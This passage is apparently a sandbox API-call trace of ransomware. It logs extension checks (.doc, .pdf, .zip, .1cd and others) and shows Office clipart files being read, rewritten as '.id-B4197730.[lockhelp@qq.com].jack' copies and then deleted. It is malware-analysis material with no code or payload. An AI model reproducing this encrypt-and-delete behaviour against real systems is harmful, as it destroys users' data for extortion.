(lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.200] lstrlenW (lpString=".doc") returned 4 [0215.200] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.200] lstrlenW (lpString=".docx") returned 5 [0215.200] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.200] lstrlenW (lpString=".pdf") returned 4 [0215.200] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.200] lstrlenW (lpString=".xls") returned 4 [0215.200] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.200] lstrlenW (lpString=".xlsx") returned 5 [0215.200] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.200] lstrlenW (lpString=".ppt") returned 4 [0215.200] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.200] lstrlenW (lpString=".zip") returned 4 [0215.200] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.200] lstrlenW (lpString=".rar") returned 4 [0215.200] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.200] lstrlenW (lpString=".bz2") returned 4 [0215.200] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.201] lstrlenW (lpString=".7z") returned 3 [0215.201] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.201] lstrlenW (lpString=".dbf") returned 4 [0215.201] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.201] lstrlenW (lpString=".1cd") returned 4 [0215.201] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.201] lstrlenW (lpString=".jpg") returned 4 [0215.201] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.201] lstrlenW (lpString=".doc") returned 4 [0215.201] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0215.201] lstrlenW (lpString=".docx") returned 5 [0215.201] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0215.201] lstrlenW (lpString=".pdf") returned 4 [0215.201] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0215.201] lstrlenW (lpString=".xls") returned 4 [0215.201] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0215.201] lstrlenW (lpString=".xlsx") returned 5 [0215.201] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0215.201] lstrlenW (lpString=".ppt") returned 4 [0215.201] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0215.201] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.201] lstrlenW (lpString=".zip") returned 4 [0215.201] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0215.202] lstrlenW (lpString=".rar") returned 4 [0215.202] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0215.202] lstrlenW (lpString=".bz2") returned 4 [0215.202] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0215.202] lstrlenW (lpString=".7z") returned 3 [0215.202] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0215.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.202] lstrlenW (lpString=".dbf") returned 4 [0215.202] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0215.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.202] lstrlenW (lpString=".1cd") returned 4 [0215.202] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0215.202] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 68 [0215.202] lstrlenW (lpString=".jpg") returned 4 [0215.202] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0215.202] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0215.202] lstrlenW (lpString="AG00171_.GIF") returned 12 [0215.202] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0215.203] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=5016) returned 1 [0215.203] CloseHandle (hObject=0x3f4) returned 1 [0215.203] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif")) returned 0x220 [0215.203] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0215.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0215.203] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.203] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0215.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0215.204] GetLastError () returned 0x0 [0215.204] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x1398, lpOverlapped=0x0) returned 1 [0218.011] WriteFile (in: hFile=0x454, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x13a0, lpOverlapped=0x0) returned 1 [0219.525] ReadFile (in: hFile=0x3f4, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0219.525] WriteFile (in: hFile=0x454, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0219.525] SetEndOfFile (hFile=0x454) returned 1 [0219.531] CloseHandle (hObject=0x454) returned 1 [0219.533] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.533] SetEndOfFile (hFile=0x3f4) returned 1 [0219.534] CloseHandle (hObject=0x3f4) returned 1 [0219.534] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0219.534] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00171_.gif")) returned 1 [0219.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.535] lstrlenW (lpString=".doc") returned 4 [0219.535] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.535] lstrlenW (lpString=".docx") returned 5 [0219.535] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.535] lstrlenW (lpString=".pdf") returned 4 [0219.535] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.535] lstrlenW (lpString=".xls") returned 4 [0219.535] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.535] lstrlenW (lpString=".xlsx") returned 5 [0219.535] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.535] lstrlenW (lpString=".ppt") returned 4 [0219.535] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.535] lstrlenW (lpString=".zip") returned 4 [0219.535] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.535] lstrlenW (lpString=".rar") returned 4 [0219.535] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.535] lstrlenW (lpString=".bz2") returned 4 [0219.535] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.535] lstrlenW (lpString=".7z") returned 3 [0219.535] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.535] lstrlenW (lpString=".dbf") returned 4 [0219.535] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.536] lstrlenW (lpString=".1cd") returned 4 [0219.536] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.536] lstrlenW (lpString=".jpg") returned 4 [0219.536] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.536] lstrlenW (lpString=".doc") returned 4 [0219.536] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.536] lstrlenW (lpString=".docx") returned 5 [0219.536] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.536] lstrlenW (lpString=".pdf") returned 4 [0219.536] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.536] lstrlenW (lpString=".xls") returned 4 [0219.536] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.536] lstrlenW (lpString=".xlsx") returned 5 [0219.536] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.536] lstrlenW (lpString=".ppt") returned 4 [0219.536] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.536] lstrlenW (lpString=".zip") returned 4 [0219.536] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.536] lstrlenW (lpString=".rar") returned 4 [0219.536] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.536] lstrlenW (lpString=".bz2") returned 4 [0219.537] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.537] lstrlenW (lpString=".7z") returned 3 [0219.537] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.537] lstrlenW (lpString=".dbf") returned 4 [0219.537] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.537] lstrlenW (lpString=".1cd") returned 4 [0219.537] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 68 [0219.537] lstrlenW (lpString=".jpg") returned 4 [0219.537] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.537] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0219.537] lstrlenW (lpString="AG00176_.GIF") returned 12 [0219.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0219.544] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3120) returned 1 [0219.544] CloseHandle (hObject=0x3ac) returned 1 [0219.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif")) returned 0x220 [0219.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0219.545] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.545] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0219.550] GetLastError () returned 0x0 [0219.550] ReadFile (in: hFile=0x3ac, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xc30, lpOverlapped=0x0) returned 1 [0219.637] WriteFile (in: hFile=0x3f4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xc40, lpOverlapped=0x0) returned 1 [0219.638] ReadFile (in: hFile=0x3ac, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0219.638] WriteFile (in: hFile=0x3f4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0219.638] SetEndOfFile (hFile=0x3f4) returned 1 [0219.638] CloseHandle (hObject=0x3f4) returned 1 [0219.639] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.639] SetEndOfFile (hFile=0x3ac) returned 1 [0219.640] CloseHandle (hObject=0x3ac) returned 1 [0219.640] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0219.641] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif")) returned 1 [0219.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.641] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.641] lstrlenW (lpString=".doc") returned 4 [0219.641] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.641] lstrlenW (lpString=".docx") returned 5 [0219.641] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.641] lstrlenW (lpString=".pdf") returned 4 [0219.641] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.641] lstrlenW (lpString=".xls") returned 4 [0219.641] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.641] lstrlenW (lpString=".xlsx") returned 5 [0219.642] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.642] lstrlenW (lpString=".ppt") returned 4 [0219.642] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.642] lstrlenW (lpString=".zip") returned 4 [0219.642] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.642] lstrlenW (lpString=".rar") returned 4 [0219.642] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.642] lstrlenW (lpString=".bz2") returned 4 [0219.642] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.642] lstrlenW (lpString=".7z") returned 3 [0219.642] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.642] lstrlenW (lpString=".dbf") returned 4 [0219.642] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.642] lstrlenW (lpString=".1cd") returned 4 [0219.642] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.642] lstrlenW (lpString=".jpg") returned 4 [0219.642] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.643] lstrlenW (lpString=".doc") returned 4 [0219.643] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0219.643] lstrlenW (lpString=".docx") returned 5 [0219.643] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0219.643] lstrlenW (lpString=".pdf") returned 4 [0219.643] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0219.643] lstrlenW (lpString=".xls") returned 4 [0219.643] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0219.643] lstrlenW (lpString=".xlsx") returned 5 [0219.643] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0219.643] lstrlenW (lpString=".ppt") returned 4 [0219.643] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0219.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.643] lstrlenW (lpString=".zip") returned 4 [0219.643] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0219.643] lstrlenW (lpString=".rar") returned 4 [0219.643] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0219.643] lstrlenW (lpString=".bz2") returned 4 [0219.643] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0219.643] lstrlenW (lpString=".7z") returned 3 [0219.643] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0219.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.643] lstrlenW (lpString=".dbf") returned 4 [0219.643] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0219.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.644] lstrlenW (lpString=".1cd") returned 4 [0219.644] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0219.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0219.644] lstrlenW (lpString=".jpg") returned 4 [0219.644] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0219.644] lstrcmpiW (lpString1=".WMF", lpString2=".jack") returned 1 [0219.644] lstrlenW (lpString="AN00790_.WMF") returned 12 [0219.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0219.652] GetFileSizeEx (in: hFile=0x424, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=5684) returned 1 [0219.652] CloseHandle (hObject=0x424) returned 1 [0219.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf")) returned 0x220 [0219.652] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0219.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0219.652] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.652] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0219.653] GetLastError () returned 0x0 [0219.653] ReadFile (in: hFile=0x424, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x1634, lpOverlapped=0x0) returned 1 [0219.800] WriteFile (in: hFile=0x3dc, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x1640, lpOverlapped=0x0) returned 1 [0219.801] ReadFile (in: hFile=0x424, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0219.801] WriteFile (in: hFile=0x3dc, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xec, lpOverlapped=0x0) returned 1 [0219.801] SetEndOfFile (hFile=0x3dc) returned 1 [0219.801] CloseHandle (hObject=0x3dc) returned 1 [0219.801] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0219.802] SetEndOfFile (hFile=0x424) returned 1 [0219.802] CloseHandle (hObject=0x424) returned 1 [0219.802] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0219.803] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00790_.wmf")) returned 1 [0219.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00790_.WMF") returned 68 [0219.803] lstrlenW (lpString=".doc") returned 4 [0219.803] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0219.803] lstrlenW (lpString=".docx") returned 5 [0219.803] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0219.803] lstrlenW (lpString=".pdf") returned 4 [0219.803] lstrcmpiW 